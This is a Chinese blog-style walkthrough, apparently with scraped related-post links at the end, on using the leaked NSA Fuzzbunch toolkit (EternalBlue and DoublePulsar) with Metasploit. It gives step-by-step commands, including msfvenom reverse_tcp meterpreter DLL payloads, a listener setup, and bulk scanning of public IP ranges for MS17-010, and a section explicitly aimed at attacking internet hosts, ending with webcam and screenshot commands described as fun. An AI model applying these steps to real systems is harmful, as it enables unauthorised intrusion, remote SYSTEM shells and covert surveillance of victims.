0x01 前言

4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。
据了解,受影响的Windows 版本包括Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。
正在使用这些Windows操作系统的你,有没有在颤抖!!虽然微软宣布已修复大部分的漏洞,但这场由于远程漏洞泄露造成的灾难性网络大地震“余震”仍在。
 
 成功的条件 靶机必须要关闭防火墙 且操作系统要低于win10 攻击机1 要关闭防火墙

0x02 fuzzbunch工具复现

攻击机1:win7 win8或者winxp(没测试过xp,应该也可以实现) ,并且要安装python2.6以及pywin32.exe     192.168.46.129
攻击机2:kali2.0 metasploit  192.168.46.131
靶机3:winxp   192.168.46.132
首先先运行工具包中的fb.py

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

use Eternalblue模块

然后一路回车到让你选择操作系统和模式 操作系统根据实际情况而定 但是模式要选择FB模式

一路回车 攻击

当出现win的时候说明攻击成功这时到攻击机2 kali上 先生成攻击文件并且将攻击文件上传至win7的目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

use exploit/multi/handler 模块

将LHOST 设置成攻击机2 kali的ip 192.168.46.131

LPORT 设置为5555

exploit进行监听

返回攻击机1 win7

use doubleplusar模块

一路回车到

选择smb模式 x86系统 RunDLL 中填入开始生成文件的位置

一路回车 ATTACK

返回kali可以看到成功了

0x03 攻击外网

1.准备环境
攻击机1:vmware12.0中的win7+python2.6+pywin32win10+PentestBox-with-Metasploit
攻击机2:win10+PentestBox-with-Metasploit
2.win7连接外网
因为我们的目的是打外网,所以就需要win7也连接外网,首先将点击vmware左上角虚拟机中的设置选项,点击网络适配器,点击桥接模式,确定
 

然后点击编辑中的虚拟网络编辑器,点击更改设置,点桥接模式,确定,就可以连接另外一个宽带了

3.攻击机2准备工作

由于kaLi连接宽带比较麻烦,故我选择用本机win10系统作为攻击机2,这里安装PentestBox-with-Metasploit 这个软件是集成了metasploit,burpsuite等工具的测试环境,很好用,下载链接自行百度

然后 我们可以用msf大批量扫描网段  use auxiliary/scanner/smb/smb_ms17_010 这个模块

如果发现自己没有这个模块 在github上下载 https://github.com/rapid7/metasploit-framework/releases

然后将压缩包中 modules\auxiliary\scanner\smb\smb_ms17_010文件复制到pentestBox相应的地方就好了 这个模块就可以大批量扫描有这个漏洞 445端口的ip

可以用show options查看用法

set RHOST 设置你需要扫描的ip   111.111.111.1/24

set RPORT 扫描端口 445

set THREADS 设置线程不要超过16  这里设置15

run 运行 就可以扫描了

黄色感叹号表示  可能有漏洞 可以利用

然后我们利用 use exploit/multi/handler  这个后门模块 监听自己的5555端口

将LHOST 设置成攻击机2 win10的ip

LPORT 设置为5555

exploit进行监听

4.攻击机1 win7准备工作

运行fb.py

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

然后 use Eternalblue 也是一路按回车

这里会问你选择 winxp 还是win7win8 这个根据实际情况来定 一定要选择FB模式 

之后也是一路回车

如果显示win的话表示成功

这里 use Doublepulsar模块 也是回车

选择SMB模式  x64位(操作系统位数) 这个也是根据情况来定

经过测试发现64位和32位的payload不一样payload生成方法 在kali中

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x64.dll  生成64位的dll文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x32.dll  生成32位dll文件

并将文件放至攻击机1 win7的c盘目录下

之后我们就回车 进行攻击 成功的话攻击机1会弹shell而且是system权限

后面的自己就可以测试了介绍一些成功后的语句

webcam_list:这个命令可以查看目标机器上是否有网络摄像头,并且列举出来。

webcam_snap:这个命令主要是远程连接目标系统的摄像头。

screenshot :桌面截图并且保存

等一系列好玩的

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP的更多相关文章

  1. DMS专线联通外网测试

    配置 CE Ping PE: “本地链接”-->属性-->"Internet 协议版本4(TCP/IPv4)",选择“使用下面的IP”,填写“172.16.10.21” ...

  2. IIS 发布网站到外网

    前段时间做了一个项目在局域网中测试后要发布到外网上,一时间不知怎么搞,以为直接在IIS中修改发布时的IP就可以了,但是不可行,经过摸索终于成功发布到外网,下面是具体步骤. 前期准备:公网IP,掩码,网 ...

  3. VMware NAT端口映射外网访问虚拟机linux

    本文目的: 一. SSH连接 二. 访问HTTP VMware Workstation提供了两种虚拟机上网方式,一种bridge,一种NAT,bridge可以获得公网地址,而NAT只能是内网地址了. ...

  4. Linux防火墙配置—访问外网WEB

    一.实验目标 1.本次实验在"Linux基础网络搭建实验"的基础上,在外网虚拟机上搭建WEB服务,并分别配置外网和网关的防火墙规则,使内网能够访问WEB服务 2.Linux基础网络 ...

  5. NatApp 外网映射工具

    外网映射工具 在做微信开发或者是对接第三方支付接口时,回调接口可能需要外网访问,这时候开发者在本地测试的时候,需要用到外网测试工具.常用的外网测试工具有natapp.ngrok NatApp简介服务器 ...

  6. 关于阿里云服务器Linux安装Tomcat后,外网不能访问解决方案

    这里需要提及三个方面的问题   第一个方面:Linux上启动防火墙的问题 当下比较流行的Linux镜像是CentOS,所以防火墙也随之变成了firewall,那么怎么操作这个防火墙呢?   #停止fi ...

  7. openvpn实现内网 映射到 外网

    openvpn实现内网 映射到 外网 场景介绍: 机器介绍 本地一台Ubuntu服务器A , 处于内网中 , 无外网IP 外网一台Ubuntu服务器B , 外网地址139.199.4.205 目标 : ...

  8. vm虚拟机中linux无法连接外网?

    问题出现的环境? vm虚拟机中安装了linux系统,vm设置了NAT方式共享主机ip,但还是没法访问外网?在linux系统中查询ip地址,没有ipv4地址,就是配置了自动获取,但是还是没有获取? 问题 ...

  9. 为虚机Linux系统设置静态IP,ping通外网并解决相关问题

    在虚机中安装完Linux系统后,虚机是ping不通外网的,而默认的动态IP会为之后的Hadoop应用造成不少麻烦,为了减少这些不必要的麻烦,我们把系统的IP设置为静态. 步骤: 修改系统配置文件 命令 ...

随机推荐

  1. 从七个方面,面试BAT大厂高级工程师,纯干货!

    转载注明:https://blog.csdn.net/WantFlyDaCheng/article/details/100078782 一.框架是重点,但别让人感觉你只会山寨别人的代码 二.别单纯看单 ...

  2. Docker 镜像与容器

    镜像和容器的关系   容器提交    commint 作用:       根据容器生成一个新的镜像        命令格式:       docker commit [OPTIONS] CONTAIN ...

  3. DockerFlie的基本命令解析

    DockerFlie官网文档:  https://docs.docker.com/engine/reference/builder/   DockerFile中文: http://www.docker ...

  4. javaWeb核心技术第九篇之JSP

    JSP:全名是Java Server Pages,它是建立在Servlet规范之上的动态网页开发技术.在JSP文件中,HTML代码与Java代码共同存在,其中,HTML代码用来实现网页中静态内容的显示 ...

  5. JS基础语法---创建对象---三种方式创建对象:调用系统的构造函数;自定义构造函数;字面量的方式

    创建对象三种方式: 调用系统的构造函数创建对象 自定义构造函数创建对象(结合第一种和需求通过工厂模式创建对象) 字面量的方式创建对象 第一种:调用系统的构造函数创建对象 //小苏举例子: //实例化对 ...

  6. SAP MCH1表和MCHA表更新逻辑

    SAP MCH1表和MCHA表更新逻辑 笔者所在的A项目里,批次是在material level 唯一, 意味着不同物料号可以有相同的批次号,只要物料号+批次号组合是唯一的即可. SE11 看MCH1 ...

  7. 034.认证方式 | 基本认证 、Token认证、 AK/SK认证

    认证方式 关于认证: https://www.cnblogs.com/badboyh2o/p/11068779.html https://www.cnblogs.com/badboyh2o/p/110 ...

  8. Linux:DHCP服务器的搭建

    了解DHCP协议工作原理 DHCP(Dynamic Host Configuration Protocol,动态主机配置协议)提供了动态配置IP地址的功能.在DHCP网络中,客户端不再需要自行输入网络 ...

  9. qtdomdocument找不到

  10. 201871010123-吴丽丽《面向对象程序设计(Java)》第十二周学习总结

    201871010123-吴丽丽<面向对象程序设计(Java)>第十二周学习总结 项目 内容 这个作业属于哪个课程  https://www.cnblogs.com/nwnu-daizh/ ...